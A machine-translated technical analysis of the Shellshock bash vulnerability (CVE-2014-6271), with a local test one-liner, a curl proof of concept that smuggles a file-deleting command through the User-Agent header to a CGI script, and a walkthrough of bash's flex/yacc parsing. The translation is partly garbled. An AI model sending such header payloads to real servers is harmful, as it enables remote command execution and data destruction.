Author: yaoxi

Documentation
This time, we combined The poc analysis to know about the Bash syntax rules, from another angle to help everyone better understand the bash and the shellshock vulnerability.

Vulnerability description
<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271&gt;
CVE-2 0 1 4-6 2 7 1 vulnerability is Stéphane Hassles France found the SHELL of a vulnerability to the environment variable values within the function definition after adding the extra string will trigger this vulnerability, an attacker can exploit this vulnerability to change or bypass environment restrictions to execute shell commands.
This vulnerability may affect to use the ForceCommand feature in OpenSSH sshd, use mod_cgi or mod_cgid Apache server, DHCP client, and the other using bash as the interpreter of the application.

Vulnerability testing
A local test

env x=’() { :;}; echo vulnerable’ bash-c “echo this is a test”

Print out:
vulnerable
this is a test

Second, the http via cgi test
Constructed poc. cgi
! [](/Article/UploadPic/2014-9/2 0 1 4 9 2 8 2 1 1 4 0 2 0 0. png)
Make sure that the local www directory there is a test. file file

curl http://127.0.0.1/poc.cgi -A ‘x=() { :; }; /bin/rm /www/test. file’

test. the file has been deleted

curl http://192.168.0.1/test.file

<! DOCTYPE HTML PUBLIC “-//IETF//DTD HTML 2.0//EN”>
<html><head>
<title>4 0 4 Not Found</title>
</head><body>
…
</body>
</html>

Vulnerability analysis
In the above test, the User-agent input“x=() { :; }; /bin/rm /www/test. file”bash syntax analysis parsing into a function definition and a command. And in parse_and_execute function command is executed, resulting in the test. file was illegally removed.
The following analysis is mainly to see the bash syntax what is the”HTTP_USER_AGENT() { :; };\n/bin/rm /www/test. file”character input is parsed into a function definition and a command of the process. Understand the bash syntax parsing process that can help us to better understand the vulnerability details.

A Bash of the lexical and syntax analysis is to use flex and yacc to achieve. About flex and yacc, and do not understand the can yourself go to query related information. Here a brief introduction about it:
Flex lexical analyzer of the data stream of all kinds of words to extract out, forming a token for the parser using the Yacc grammar Analyzer the grammar symbols according to certain rules to move into-Statute of operation, the final reduction of the target S grammar

Second, Bash the lexical token in y. tab. c can be found, word_token_alist and other_token_alist, etc. in the array definition. Bash syntax is defined in parse. y defined in the file.
The analysis of the input data:”HTTP_USER_AGENT() \n{\n :;\n };/bin/rm /www/test. file”
! [](/Article/UploadPic/2014-9/2 0 1 4 9 2 8 2 1 1 4 0 9 4 0. png)
In Statute to function_def state when you create the function definition, as follows interface:
{ $$ = make_function_def ($1, $5, function_dstart, function_bstart); }
The corresponding$1= HTTP_USER_AGENT, $5 value as a function of the body, function_dstart as a function of the defined start line,
function_bstart for the body of the function define the start line.
/bin/rm /www/test. the file is in simple_command: the state of time, create a command, call the interface:
COMMAND *make_simple_command (element, command)

Third, in parse_and_execute function of the Central decomposition analysis of the work by yyparse complete it in parse_command is called.

[1] [2] next